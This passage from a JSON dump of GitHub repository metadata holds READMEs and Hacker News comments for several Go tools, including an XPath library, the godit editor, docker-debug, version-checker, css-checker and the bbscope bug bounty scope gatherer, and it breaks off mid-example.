"XPath\n====\n[![GoDoc](https://godoc.org/github.com/antchfx/xpath?status.svg)](https://godoc.org/github.com/antchfx/xpath)\n[![Coverage Status](https://coveralls.io/repos/github/antchfx/xpath/badge.svg?branch=master)](https://coveralls.io/github/antchfx/xpath?branch=master)\n[![Build Status](https://travis-ci.org/antchfx/xpath.svg?branch=master)](https://travis-ci.org/antchfx/xpath)\n[![Go Report Card](https://goreportcard.com/badge/github.com/antchfx/xpath)](https://goreportcard.com/report/github.com/antchfx/xpath)\n\nXPath is Go package provides selecting nodes from XML, HTML or other documents using XPath expression.\n\nImplementation\n===\n\n- [htmlquery](https://github.com/antchfx/htmlquery) - an XPath query package for HTML document\n\n- [xmlquery](https://github.com/antchfx/xmlquery) - an XPath query package for XML document.\n\n- [jsonquery](https://github.com/antchfx/jsonquery) - an XPath query package for JSON document\n\nSupported Features\n===\n\n#### The basic XPath patterns.\n\n> The basic XPath patterns cover 90% of the cases that most stylesheets will need.\n\n- `node` : Selects all child elements with nodeName of node.\n\n- `*` : Selects all child elements.\n\n- `@attr` : Selects the attribute attr.\n\n- `@*` : Selects all attributes.\n\n- `node()` : Matches an org.w3c.dom.Node.\n\n- `text()` : Matches a org.w3c.dom.Text node.\n\n- `comment()` : Matches a comment.\n\n- `.` : Selects the current node.\n\n- `..` : Selects the parent of current node.\n\n- `/` : Selects the document node.\n\n- `a[expr]` : Select only those nodes matching a which also satisfy the expression expr.\n\n- `a[n]` : Selects the nth matching node matching a When a filter's expression is a number, XPath selects based on position.\n\n- `a/b` : For each node matching a, add the nodes matching b to the result.\n\n- `a//b` : For each node 
matching a, add the descendant nodes matching b to the result. \n\n- `//b` : Returns elements in the entire document matching b.\n\n- `a|b` : All nodes matching a or b, union operation(not boolean or).\n\n- `(a, b, c)` : Evaluates each of its operands and concatenates the resulting sequences, in order, into a single result sequence\n\n- `(a/b)` : Selects all matches nodes as grouping set.\n\n#### Node Axes \n\n- `child::*` : The child axis selects children of the current node.\n\n- `descendant::*` : The descendant axis selects descendants of the current node. It is equivalent to '//'.\n\n- `descendant-or-self::*` : Selects descendants including the current node.\n\n- `attribute::*` : Selects attributes of the current element. It is equivalent to @*\n\n- `following-sibling::*` : Selects nodes after the current node.\n\n- `preceding-sibling::*` : Selects nodes before the current node.\n\n- `following::*` : Selects the first matching node following in document order, excluding descendants. \n\n- `preceding::*` : Selects the first matching node preceding in document order, excluding ancestors. \n\n- `parent::*` : Selects the parent if it matches. The '..' pattern from the core is equivalent to 'parent::node()'.\n\n- `ancestor::*` : Selects matching ancestors.\n\n- `ancestor-or-self::*` : Selects ancestors including the current node.\n\n- `self::*` : Selects the current node. '.' is equivalent to 'self::node()'.\n\n#### Expressions\n\n The gxpath supported three types: number, boolean, string.\n\n- `path` : Selects nodes based on the path.\n\n- `a = b` : Standard comparisons.\n\n * a = b\t True if a equals b.\n * a != b\tTrue if a is not equal to b.\n * a < b\t True if a is less than b.\n * a <= b\tTrue if a is less than or equal to b.\n * a > b\t True if a is greater than b.\n * a >= b\tTrue if a is greater than or equal to b.\n\n- `a + b` : Arithmetic expressions.\n\n * `- a`\tUnary minus\n * a + b\tAdd\n * a - b\tSubstract\n * a * b\tMultiply\n * a div b\tDivide\n * a mod b\tFloating point mod, like Java.\n\n- `a or b` : Boolean `or` operation.\n\n- `a and b` : Boolean `and` operation.\n\n- `(expr)` : Parenthesized expressions.\n\n- `fun(arg1, ..., argn)` : Function calls:\n\n| Function | Supported |\n| --- | --- |\n`boolean()`| \u2713 |\n`ceiling()`| \u2713 |\n`choose()`| \u2717 |\n`concat()`| \u2713 |\n`contains()`| \u2713 |\n`count()`| \u2713 |\n`current()`| \u2717 |\n`document()`| \u2717 |\n`element-available()`| \u2717 |\n`ends-with()`| \u2713 |\n`false()`| \u2713 |\n`floor()`| \u2713 |\n`format-number()`| \u2717 |\n`function-available()`| \u2717 |\n`generate-id()`| \u2717 |\n`id()`| \u2717 |\n`key()`| \u2717 |\n`lang()`| \u2717 |\n`last()`| \u2713 |\n`local-name()`| \u2713 |\n`matches()`| \u2713 |\n`name()`| \u2713 |\n`namespace-uri()`| \u2713 |\n`normalize-space()`| \u2713 |\n`not()`| \u2713 |\n`number()`| \u2713 |\n`position()`| \u2713 |\n`replace()`| \u2713 |\n`reverse()`| \u2713 |\n`round()`| \u2713 |\n`starts-with()`| \u2713 |\n`string()`| \u2713 |\n`string-length()`| \u2713 |\n`substring()`| \u2713 |\n`substring-after()`| \u2713 |\n`substring-before()`| \u2713 |\n`sum()`| \u2713 |\n`system-property()`| \u2717 |\n`translate()`| \u2713 |\n`true()`| \u2713 |\n`unparsed-entity-url()` | \u2717 |", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nsf/godit", "link": "https://github.com/nsf/godit", "tags": [], "stars": 548, "description": "A very religious text editor", "lang": "Go", "repo_lang": "", 
"readme": " --== Godit - a very religious text editor ==--\n\nScreenshots:\n\n * https://nosmileface.dev/images/godit-linux1.png\n * https://nosmileface.dev/images/godit-linux2.png\n\nI call it religious, because there is a strong faith in the \"one true way\"\nof doing things. By that I mean things like: \"the tab size is always an\nequivalent to 8 spaces/characters\" or \"each line ends with '\\n' symbol and\nsomeone should end this '\\r\\n' madness\" or \"text files are always utf-8\nencoded\". Most editors provide customizable options for these things, but\ngodit takes a different approach in that area and has no settings at all. So,\nthat concludes the ideology behind godit.\n\nIf you're interested in what godit feels like, it would be fair to say that it\nis an emacsish lightweight text editor. The godit uses many of the emacs key\nbindings and operates using a notion of \"micromodes\". It's easier to explain\nwhat a micromode is by a simple example. Let's take the keyboard macros feature\nfrom both emacs and godit. You can start recording a macro using `C-x (` key\ncombination and then when you're ready to start repeating it, you do the\nfollowing: `C-x e (e...)`. Not only `C-x e` ends the recording of a macro, it\nexecutes the macro once and enters a micromode, where typing `e` again, will\nrepeat that action. But as soon as some other key was pressed you quit this\nmicromode and everything is back to normal again. The idea of micromode is used\nin godit a lot.\n\n\n --== List of keybindings ==--\n\nBasic things:\n C-g - Universal cancel button\n C-x C-c - Quit from the godit\n C-x C-s - Save file [prompt maybe]\n C-x S - Save file (raw) [prompt maybe]\n C-x M-s - Save file as [prompt]\n C-x M-S - Save file as (raw) [prompt]\n C-x C-f - Open file\n M-g - Go to line [prompt]\n C-/ - Undo\n C-x C-/ (C-/...) - Redo\n\nView/buffer operations:\n C-x C-w - View operations mode\n C-x 0 - Kill active view\n C-x 1 - Kill all views but active\n C-x 2 - Split active view vertically\n C-x 3 - Split active view horizontally\n C-x o - Make a sibling view active\n C-x b - Switch buffer in the active view [prompt]\n C-x k - Kill buffer in the active view\n\nView operations mode:\n v - Split active view vertically\n h - Split active view horizontally\n k - Kill active view\n C-f, - Expand/shrink active view to the right\n C-b, - Expand/shrink active view to the left\n C-n, - Expand/shrink active view to the bottom\n C-p, - Expand/shrink active view to the top\n 1, 2, 3, 4, ... 
- Select view\n\nCursor/view movement and text editing:\n C-f, - Move cursor one character forward\n M-f - Move cursor one word forward\n C-b, - Move cursor one character backward\n M-b - Move cursor one word backward\n C-n, - Move cursor to the next line\n C-p, - Move cursor to the previous line\n C-e, - Move cursor to the end of line\n C-a, - Move cursor to the beginning of the line\n C-v, - Move view forward (half of the screen)\n M-v, - Move view backward (half of the screen)\n C-l - Center view on line containing cursor\n C-s - Search forward [interactive prompt]\n C-r - Search backward [interactive prompt]\n C-j - Insert a newline character and autoindent\n - Insert a newline character\n - Delete one character backwards\n C-d, - Delete one character in-place\n M-d - Kill word\n M- - Kill word backwards\n C-k - Kill line\n M-u - Convert the following word to upper case\n M-l - Convert the following word to lower case\n M-c - Capitalize the following word\n - Insert character\n\nMark and region operations:\n C- - Set mark\n C-x C-x - Swap cursor and mark locations\n C-x > (>...) - Indent region (lines between the cursor and the mark)\n C-x < (<...) - Deindent region (lines between the cursor and the mark)\n C-x C-r - Search & replace (within region) [prompt]\n C-x C-u - Convert the region to upper case\n C-x C-l - Convert the region to lower case\n C-w - Kill region (between the cursor and the mark)\n M-w - Copy region (between the cursor and the mark)\n C-y - Yank (aka Paste) previously killed/copied text\n M-q - Fill region (lines between the cursor and the mark) [prompt]\n\nAdvanced:\n M-/ - Local words autocompletion\n C-x C-a - Invoke buffer specific autocompletion menu [menu]\n C-x ( - Start keyboard macro recording\n C-x ) - Stop keyboard macro recording\n C-x e (e...) - Stop keyboard macro recording and execute it\n C-x = - Info about character under the cursor\n C-x ! - Filter region through an external command [prompt]\n\n\n --== Current development state==--\n\nI'm still in process of designing some parts of it. Bits of functionality are\nmissing, but frankly I write godit in godit already and I use godit for\neverything else on my system (EDITOR=godit). This README was written in godit\nfrom scratch, I write commit messages in godit, I write code in godit, I write\nconfigs and scripts in godit. The editor is definitely usable, but it is\ncertain that some corner cases are not covered. Just try it, perhaps you would\nlike it. Oh and I'm very picky about feature suggestions at the moment,\nsuggest, but don't expect too much.\n", "readme_type": "text", "hn_comments": "I'm wondering this myself. I'm currently in a part-time contract for indie game development work. While it's been great, as far as I know it's an unusual situation to be in. It hasn't been easy for me to find another good complementary PT software job.I am not expecting stocks or huge benefits at these sorts of jobs. What I am hoping to get out of these jobs is a stepping stone into more advanced and involved roles with the company. My current PT job is a big departure from my last job in terms of both tech skills and industry.I'd love such an arrangement myself too, especially remotely. I have friends who tutor on Thinkful or some other company so they can choose to do fewer hours a week and dedicate themselves to family/projects, but that pays much less than working as an engineer. It works for them because they live in low cost-of-living countries.Yes.[thanks for asking this. 
i had always wondered how those physicists felt / could have done what they did. and now i read your question and understand them much better.]\"the tab size is always an equivalent to 8 spaces/characters\" - our faiths are incompatible8 characters tab width is insane. :(But why oh why immitate the Emacs shortcuts?I love Emacs. I use it all the time. But the default shortcuts are the most stupid thing ever. That Control-x (C-x in Emacs lingua) is insanity at its best: due to the stupid non-symmetric layout of typical staggered keyboards 'x' in itself is one the hardest key to type (the equivalent with the right hand is way easier : '>' on a QWERTY keyboard). I'm a touch-typist and to hit 'x' I need to move my whole hand a bit. To hit '>' I just need to move on finger. I blame this on the fact that keyboard are using a staggered layout instead of a matrix or symmetric layout but whatever.Then Control. Zomg. Control has to be accessed with the left pinky if you're a touch-typist: some very touch-typist friendly keyboards like the HHKB Pro 2 don't even botter with a right control key.So to hit \"C-x\" you're supposed to use the two leftmost fingers of your left hand: this alone has to be one of the most RSI inducing keyboard shortcut ever.But in Emacs everything is configurable. So I'm using \"C-,\" to replace \"C-x\" and \"M-,\" to replace \"M-x\".It shall never cease to amaze me (in a very sad way) that when people \"copy Emacs\", the first thing they copy are the Emacs shortcuts. The Emacs shortcuts are the lamest thing ever in Emacs.I love Emacs but I hate its default shortcuts. Emacs is not about its shortcuts: Emacs is about tailoring it to your needs by using Lisp.I'm also wondering why that constant loss of energy in editors which shall never produce anything close to what one million lines of elisp code are providing. I'd much rather see that energy spend on creating a bridge for the Go-completion facility in Emacs, the real thing. And no wonder, for Satan himself masquerades as an angel of light.\n ~ 2 Corinthians 11:15\n\nEmacs is the devilIs it a Go thing to have no file organisation? (Is this tooling sufficiently nice that this is manageable?)I think Gomacs or Gemacs would've been better name. It looks so similar to emacs.Performance is truly impressive. And I really love how small the codebase actually is. I've been dreaming about writing my own text editor for quite some time. This will really help me to get started, thanks a lot nsf!p.s. 
panic on opening a directory isn't really a best way to say that you don't support viewing directories...why not just emacs?if only it had Vim bindings instead of Emacs bindings :/I've been searching for something less bloated than Vim for a while (straight vi doesn't cut it).", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zeromake/docker-debug", "link": "https://github.com/zeromake/docker-debug", "tags": ["docker", "debug", "cli", "exec"], "stars": 548, "description": "use new container attach on already container go on debug", "lang": "Go", "repo_lang": "", "readme": "# Docker-debug\n\n[![Build Status](https://github.com/zeromake/docker-debug/actions/workflows/release.yml/badge.svg)](https://github.com/zeromake/docker-debug/actions/workflows/release.yml)\n[![Go Report Card](https://goreportcard.com/badge/zeromake/docker-debug)](https://goreportcard.com/report/zeromake/docker-debug)\n\n[English](README.md) \u2219 [\u7b80\u4f53\u4e2d\u6587](README-zh-Hans.md)\n\n## Overview\n\n`docker-debug` is an troubleshooting running docker container,\nwhich allows you to run a new container in running docker for debugging purpose.\nThe new container will join the `pid`, `network`, `user`, `filesystem` and `ipc` namespaces of the target container, \nso you can use arbitrary trouble-shooting tools without pre-installing them in your production container image.\n\n## Demo\n[![asciicast](https://asciinema.org/a/235025.svg)](https://asciinema.org/a/235025)\n## Quick Start\n\nInstall the `docker-debug` cli\n\n**mac brew**\n```shell\nbrew install zeromake/docker-debug/docker-debug\n```\n\n**download binary file**\n\n
\n\nuse bash or zsh\n\n\n``` bash\n# get latest tag\nVERSION=`curl -w '%{url_effective}' -I -L -s -S https://github.com/zeromake/docker-debug/releases/latest -o /dev/null | awk -F/ '{print $NF}'`\n\n# MacOS Intel\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-darwin-amd64\n\n# MacOS M1\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-darwin-arm64\n\n# Linux\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-linux-amd64\n\nchmod +x ./docker-debug\nsudo mv docker-debug /usr/local/bin/\n\n# Windows\ncurl -Lo docker-debug.exe https://github.com/zeromake/docker-debug/releases/download/${VERSION}/docker-debug-windows-amd64.exe\n```\n\n
\n\n
\n\nuse fish\n\n\n``` fish\n# get latest tag\nset VERSION (curl -w '%{url_effective}' -I -L -s -S https://github.com/zeromake/docker-debug/releases/latest -o /dev/null | awk -F/ '{print $NF}')\n\n# MacOS Intel\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-darwin-amd64\n\n# MacOS M1\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-darwin-arm64\n\n# Linux\ncurl -Lo docker-debug https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-linux-amd64\n\nchmod +x ./docker-debug\nsudo mv docker-debug /usr/local/bin/\n\n# Windows\ncurl -Lo docker-debug.exe https://github.com/zeromake/docker-debug/releases/download/$VERSION/docker-debug-windows-amd64.exe\n```\n
\n\n\ndownload the latest binary from the [release page](https://github.com/zeromake/docker-debug/releases/lastest) and add it to your PATH.\n\n**Try it out!**\n``` shell\n# docker-debug [OPTIONS] CONTAINER COMMAND [ARG...] [flags]\ndocker-debug CONTAINER COMMAND\n\n# More flags\ndocker-debug --help\n\n# info\ndocker-debug info\n```\n\n## Build from source\nClone this repo and:\n``` shell\ngo build -o docker-debug ./cmd/docker-debug\nmv docker-debug /usr/local/bin\n```\n\n## Default image\ndocker-debug uses nicolaka/netshoot as the default image to run debug container.\nYou can override the default image with cli flag, or even better, with config file ~/.docker-debug/config.toml\n``` toml\nversion = \"0.7.4\"\nimage = \"nicolaka/netshoot:latest\"\nmount_dir = \"/mnt/container\"\ntimeout = 10000000000\nconfig_default = \"default\"\n\n[config]\n [config.default]\n version = \"1.40\"\n host = \"unix:///var/run/docker.sock\"\n tls = false\n cert_dir = \"\"\n cert_password = \"\"\n```\n\n## Todo\n- [x] support windows7(Docker Toolbox)\n- [ ] support windows10\n- [ ] refactoring code\n- [ ] add testing\n- [x] add changelog\n- [x] add README_CN.md\n- [x] add brew package\n- [x] docker-debug version manage config file\n- [x] cli command set mount target container filesystem\n- [x] mount volume filesystem\n- [x] docker connection config on cli command\n- [x] `-v` cli args support\n- [ ] docker-debug signal handle smooth exit\n- [ ] cli command document on readme\n- [ ] config file document on readme\n- [ ] add http api and web shell\n\n## Details\n1. find image docker is has, not has pull the image.\n2. find container name is has, not has return error.\n3. from customize image runs a new container in the container's namespaces (ipc, pid, network, etc, filesystem) with the STDIN stay open.\n4. create and run a exec on new container.\n5. Debug in the debug container.\n6. then waits for the debug container to exit and do the cleanup.\n\n## Reference & Thank\n1. [kubectl-debug](https://github.com/aylei/kubectl-debug): `docker-debug` inspiration is from to this a kubectl debug tool.\n2. [Docker\u6838\u5fc3\u6280\u672f\u4e0e\u5b9e\u73b0\u539f\u7406](https://draveness.me/docker): `docker-debug` filesystem is from the blog.\n3. [docker-engine-api-doc](https://docs.docker.com/engine/api/latest): docker engine api document.\n\n## Contributors\n\n### Code Contributors\n\nThis project exists thanks to all the people who contribute. [[Contribute](CONTRIBUTING.md)].\n\n\n### Financial Contributors\n\nBecome a financial contributor and help us sustain our community. [[Contribute](https://opencollective.com/docker-debug/contribute)]\n\n#### Individuals\n\n\n\n#### Organizations\n\nSupport this project with your organization. Your logo will show up here with a link to your website. 
[[Contribute](https://opencollective.com/docker-debug/contribute)]\n\n\n\n\n\n\n\n\n\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jetstack/version-checker", "link": "https://github.com/jetstack/version-checker", "tags": ["kubernetes", "prometheus", "image", "version", "utility", "sre", "go", "grafana", "grafana-dashboard", "docker", "quay", "gcr"], "stars": 548, "description": "Kubernetes utility for exposing image versions in use, compared to latest available upstream, as metrics.", "lang": "Go", "repo_lang": "", "readme": "# version-checker\n\nversion-checker is a Kubernetes utility for observing the current versions of\nimages running in the cluster, as well as the latest available upstream. These\nchecks get exposed as Prometheus metrics to be viewed on a dashboard, or _soft_\nalert cluster operators.\n\n> This tool is currently experimental.\n\nIf you're interested in this tool, version checking is a built-in feature\nin our [Preflight](https://preflight.jetstack.io/) product. You may want to \ncheck it out if you would like multi-cluster component version checking.\n\n## Registries\n\nversion-checker supports the following registries:\n\n- [ACR](https://azure.microsoft.com/en-us/services/container-registry/)\n- [Docker Hub](https://hub.docker.com/)\n- [ECR](https://aws.amazon.com/ecr/)\n- [GCR](https://cloud.google.com/container-registry/) (inc gcr facades such as k8s.gcr.io)\n- [Quay](https://quay.io/)\n- Self Hosted (Docker V2 API compliant registries, e.g.\n [registry](https://hub.docker.com/_/registry),\n [artifactory](https://jfrog.com/artifactory/) etc.). Multiple self hosted\n registries can be configured at once.\n\nThese registries support authentication.\n\n---\n\n## Installation\n\nversion-checker can be installed as either static manifests;\n\n```sh\n$ kubectl apply -k ./deploy/yaml\n```\n\nOr through helm;\n\n```sh\n$ cd ./deploy/charts/version-checker && kubectl create namespace version-checker\n$ helm install version-checker . -n version-checker\n```\n\nThe helm chart supports creating a Prometheus/ServiceMonitor to expose the\nversion-checker metrics.\n\n#### Grafana Dashboard\n\nA [grafana dashboard](https://grafana.com/grafana/dashboards/12833) is also\navailable to view the image versions as a table.\n\n![](img/grafana.jpg)\n
\n\n---\n\n## Options\n\nBy default, without the flag `-a, --test-all-containers`, version-checker will\nonly test containers where the pod has the annotation\n`enable.version-checker.io/*my-container*`, where `*my-container*` is the `name`\nof the container in the pod.\n\nversion-checker supports the following annotations present on **other** pods to\nenrich version checking on image tags:\n\n- `pin-major.version-checker.io/my-container: 4`: will pin the major version to\n check to 4 (`v4.0.0`).\n\n- `pin-minor.version-checker.io/my-container: 3`: will pin the minor version to\n check to 3 (`v0.3.0`).\n\n- `pin-patch.version-checker.io/my-container: 23`: will pin the patch version to\n check to 23 (`v0.0.23`).\n\n- `use-metadata.version-checker.io/my-container: \"true\"`: will allow to search\n for image tags which contain information after the first part of the semver\n string. For example, this can be pre-releases or build metadata\n (`v1.2.4-alpha.0`, `v1.2.3-debian-r3`).\n\n- `use-sha.version-checker.io/my-container: \"true\"`: will check against the latest\n SHA tag available. Essentially, the latest image by date. This is silently\n set to true if no image tag, or \"latest\" image tag is set. Cannot be used with\n any other options.\n\n- `match-regex.version-checker.io/my-container: ^v\\d+\\.\\d+\\.\\d+-debian-`: is\n used for only comparing against image tags which match the regex set. For\n example, the above annotation will only check against image tags which have\n the form of something like `v1.3.4-debian-r30`.\n `use-metadata.version-checker.io` is not required when this is set. All\n other options, apart from URL overrides, are ignored when this is set.\n\n- `override-url.version-checker.io/my-container: docker.io/bitnami/etcd`: is\n used to change the URL for where to lookup where the latest image version\n is. In this example, the current version of `my-container` will be compared\n against the image versions in the `docker.io/bitnami/etcd` registry.\n\n\n## Metrics\n\nBy default, version-checker will expose the version information as Prometheus\nmetrics on `0.0.0.0:8080/metrics`.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ruilisi/css-checker", "link": "https://github.com/ruilisi/css-checker", "tags": ["css", "redundancy-analysis", "cicd", "code-quality"], "stars": 547, "description": "Reduce Similar & Duplicated CSS Classes with Diff in Seconds!", "lang": "Go", "repo_lang": "", "readme": "

# CSS Checker - Less is More\n\n(logo: CSS-CHECKER)\n\n\u4e2d\u6587\u6587\u6863 (Chinese documentation)
\n\n## Purpose\n\n`css-checker` checks your CSS styles for duplications and finds the diff among `CSS classes` with high similarity in seconds. It is designed to avoid redundantly or `similar css` and `styled components` between files and to work well for both local developments, and for automation like CI.\n\nSimilarity check, duplication check, colors check, long lines warning are supported by default. Styled components check, Unused CSS check can be enabled optionally. CSS checker can help reduce CSS code for developers in seconds.\n\n

See more on Wiki
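As a rough, illustrative sketch (not taken from css-checker itself), one way to picture the pairwise core of the line-hashing idea described under 'How to get similarities between classes?' below might look like this in Go; `sharedDeclarations`, the map keyed on raw declaration text instead of a hash, and the sample classes are all inventions of this example:

```go
package main

import (
	"fmt"
	"strings"
)

// sharedDeclarations counts identical (trimmed) declarations between two CSS
// classes. It is a simplified, two-class stand-in for the LineHash -> Section
// map the README describes: instead of hashing every line of every class up
// front, it just keys a map on the raw declaration text.
func sharedDeclarations(a, b string) int {
	seen := make(map[string]bool)
	for _, d := range strings.Split(a, ";") {
		if d = strings.TrimSpace(d); d != "" {
			seen[d] = true
		}
	}
	n := 0
	for _, d := range strings.Split(b, ";") {
		if d = strings.TrimSpace(d); d != "" && seen[d] {
			n++
		}
	}
	return n
}

func main() {
	btn := "color: red; margin: 4px; padding: 8px; border: none"
	cta := "color: red; margin: 4px; padding: 8px; font-weight: bold"
	// Three of the four declarations are identical between the two classes.
	fmt.Println("shared declarations:", sharedDeclarations(btn, cta))
}
```

The real tool hashes whole lines, compares every pair of classes at once, and presumably converts counts like this into the percentage that is matched against `sim-threshold`.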

\n\n## Install\n\n#### Using Go\uff1a\n\n```\ngo install github.com/ruilisi/css-checker@latest\n```\n\n(With go version before 1.17, use `go get github.com/ruilisi/css-checker`). Or download from [releases](https://github.com/ruilisi/css-checker/releases)\n\n#### Using npm\uff1a\n\n```\nnpm install -g css-checker-kit\n```\n\n## Usage\n\n#### Run\n\n- `cd PROJECT_WITH_CSS_FILES` and just run:\n\n```\ncss-checker\n```\n\n- (Beta Feature: styled components check): `css-checker -styled`\n\n![DEMO](https://assets.ruilisi.com/css-checker-demo.gif)\n\n(Check and show the diff among similar classes (>=80%). Colors, long scripts that are used more than once will also be pointed out by default. Check `css-checker -help` for customized options.)\n\n- Colors with `rgb/rgba/hsl/hsla/hex` will be converted to rbga and compared together.\n\n- (Alpha Feature: Find classes that are not referred to by your code): `css-checker -unused`\n\n#### Run with path\n\n- `css-checker -path=YOUR_PROJECT_PATH`\n\n#### File Ignores\n\n- CSS-Checker ignores paths in `.gitignore` by default (You can disable this to read all files by using `-unrestricted=true`).\n- For adding extra paths to ignore, using: `-ignores=node_modules,packages `.\n\n#### Config File\n\n- `css-checker.yaml`: CSS-Checker read this yaml file in your project path for settings, you can use parameters in `Basic Commands` sections to set up this file (without the leading '-').\n- A sample yaml file named 'css-checker.example.yaml' is also provided in this project, move it to your project path with the name 'css-checker.yaml' and it will work.\n- To specify your config file, use `-config=YOUR_CONFIG_FILE_PATH`.\n\n#### Advanced Features\n\n- Run with styled components check only (without checks for css): `css-checker -css=false -styled`\n- Find classes that not referred by your code: `css-checker -unused` (Alpha)\n\n#### Basic commands\n\n- `colors`: whether to check colors (default true)\n- `css`: whether to check css files (default true as you expected)\n- `config`: set configuration file path (string, default './css-checker.yaml')\n- `ignores`: paths and files to be ignored (e.g. node_modules,\\*.example.css) (string, default '')\n- `length-threshold`: Min length of a single style value (no including the key) that to be considered as long script line (default 20)\n- `long-line`: whether to check duplicated long script lines (default true)\n- `path`: set path to files, default to be current folder (default \".\")\n- `sections`: whether to check css class duplications (default true)\n- `sim`: whether to check similar css classes (default true)\n- `sim-threshold`: Threshold for Similarity Check ($\\geq20$ && $\\lt100$) (int only, e.g. 80 for 80%, checks for identical classes defined in `sections`) (default 80)\n- `styled`: checks for styled components (default false)\n- `unrestricted`: search all files (gitignore)\n- `unused`: whether to check unused classes (Beta)\n- `version`: prints current version and exits\n- `to-file`: wherther generate a html file (default true)\n- `file-name`: if to-file is true, set the html file name(default css-checker.html)\n\n\n#### Outputs:\n\n![image.png](https://assets.ruilisi.com/t=yDNXWrmyg+V6mUzCAG7A==)\n\n#### How to get similarities between classes?\n\n0. Hash each line of class (aka. `section` in our code), Generate map: `LineHash -> Section`.\n1. Convert map `LineHash -> Section` => `[SectionIndex1][SectionIndex2] -> Duplicated Hashes`, section stands for css class.\n2. 
In map: `[SectionIndex1][SectionIndex2]` -> `Duplicated Hashes`, number of the duplicated hashes stands for duplicated lines between classes.\n\n#### Similarity Check\n\nCheck similarities ($\\geq(sim-threshold)$ && $\\lt100$) between classes. This will print the same line in between classes.\n\n- $sim-threshold$: using `-sim-threshold=` params or setting `sim-threshold:` in config yaml file, default 80, min 20.\n\n![image.png](https://assets.ruilisi.com/bzljM=P4Mz+dmtHKNvdHtg==)\n\n#### Duplicated CSS Classes\n\nSimilar to `Similarity Check` but put those classes that are totally identical to each other.\n\n#### Long Script Line Check\n\nLong scripts can be saved as variables to make your life easier. This will only alert when long lines are used for more than once.\n\n![image.png](https://assets.ruilisi.com/5bdqZTuLTzJCaGSynA7+2w==)\n\n#### Colors Check\n\nCheck colors in HEX/RGB/RGBA/HSL/HSLA that are used more than once in your code. As for supporting of different themes and possibly future updates of your color set, you may consider putting them as CSS variables.\n\n![image.png](https://assets.ruilisi.com/iqmnGQHwglb+pxE3kr3L1Q==)\n\n## Build & Release\n\n- `make test-models`\n- `make build`\n- `make release`\n\n## Q&A\n#### Ugly output in PowerShell\nFrom PowerShell, paste the following script and run it to activate `ANSI escape sequences`, then restart your PowerShell.\n```\nSet-ItemProperty HKCU:\\Console VirtualTerminalLevel -Type DWORD 1\n```\n\n## Authors\n- [Xiemala Team](https://xiemala.com). It helps in removing hundreds of similar CSS classes for developers in this project.\n", "readme_type": "markdown", "hn_comments": "If I understand this correctly, it is similar to Parcel's bundler/minifier: https://css-tricks.com/parcel-css/Except that Parcel is a parser, deduper, transformer [autoprefixer, future-CSS-to-current-convertor] and minifier.And that, in turn, is based on CSSNano [although it is a complete rewrite in Rust], IIRC.Can someone confirm that I understand correctly, and if so, how does this compare to Parcel? To CSSNano or PurgeCSS?I use https://www.projectwallace.com/ to check CSS quality. It does a lot more than just checking for similar declarations.> It is designed to avoid redundant or similar css between filesSee also CSS Stats, https://cssstats.com/, and atomic/functional/utility CSS libraries more generally which are designed exactly to eliminate as much redundant CSS as possible.these type of tools always end up biting you in the assSince when is CSS a \u201cscript\u201d?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sw33tLie/bbscope", "link": "https://github.com/sw33tLie/bbscope", "tags": [], "stars": 547, "description": "Scope gathering tool for HackerOne, Bugcrowd, Intigriti, YesWeHack, and Immunefi!", "lang": "Go", "repo_lang": "", "readme": "# bbscope\nThe ultimate scope gathering tool for [HackerOne](https://hackerone.com/), [Bugcrowd](https://bugcrowd.com/), [Intigriti](https://intigriti.com), [Immunefi](https://immunefi.com/) and [YesWeHack](https://yeswehack.com/) by sw33tLie.\n\nNeed to grep all the large scope domains that you've got on your bug bounty platforms? This is the right tool for the job. \nWhat about getting a list of android apps that you are allowed to test? We've got you covered as well.\n\nReverse engineering god? 
No worries, you can get a list of binaries to analyze too :)\n\n## Installation\nMake sure you've a recent version of the Go compiler installed on your system.\nThen just run:\n```\nGO111MODULE=on go install github.com/sw33tLie/bbscope@latest\n```\n\n## Usage\n```\nbbscope (h1|bc|it) -t \n```\nHow to get the session token:\n- HackerOne: login, then grab your API token [here](https://hackerone.com/settings/api_token/edit)\n- Bugcrowd: login, then grab the `_crowdcontrol_session` cookie\n- Intigriti: login, then intercept a request to api.intigriti.com and look for the `Authentication: Bearer XXX` header. XXX is your token\n- YesWeHack: login, then intercept a request to api.yeswehack.com and look for the `Authorization: Bearer XXX` header. XXX is your token\n\nWhen using bbscope for HackerOne, the username flag (`-u`) is mandatory.\n\nRemember that you can use the --help flag to get a description for all flags.\n\n## Examples\nBelow you'll find some example commands.\nKeep in mind that all of them work with Bugcrowd, Intigriti and YesWeHack subcommands (`bc`, `it` and `ywh`) as well, not just with `h1`.\n\n### Print all in-scope targets from all your HackerOne programs that offer rewards\n```\nbbscope h1 -t -u -b -o t\n```\nThe output will look like this:\n```\napp.example.com\n*.user.example.com\n*.demo.com\nwww.something.com\n```\n\n### Print all in-scope targets from all your private Bugcrowd programs that offer rewards\n```\nbbscope bc -t -b -p -o t\n```\n\n### Print all in-scope Android APKs from all your HackerOne programs\n```\nbbscope h1 -t -u -o t -c android\n```\n\n### Print all in-scope targets from all your HackerOne programs with extra data\n\n```\nbbscope h1 -t -u -o tdu -d \", \"\n```\n\nThis will print a list of in-scope targets from all your HackerOne programs (including public ones and VDPs) but, on the same line, it will also print the target description (when available) and the program's URL.\nIt might look like this:\n```\nsomething.com, Something's main website, https://hackerone.com/something\n*.demo.com, All assets owned by Demo are in scope, https://hackerone.com/demo\n```\n### Get program URLs for your HackerOne private programs\n\n```\nbbscope h1 -t -u -o u -p | sort 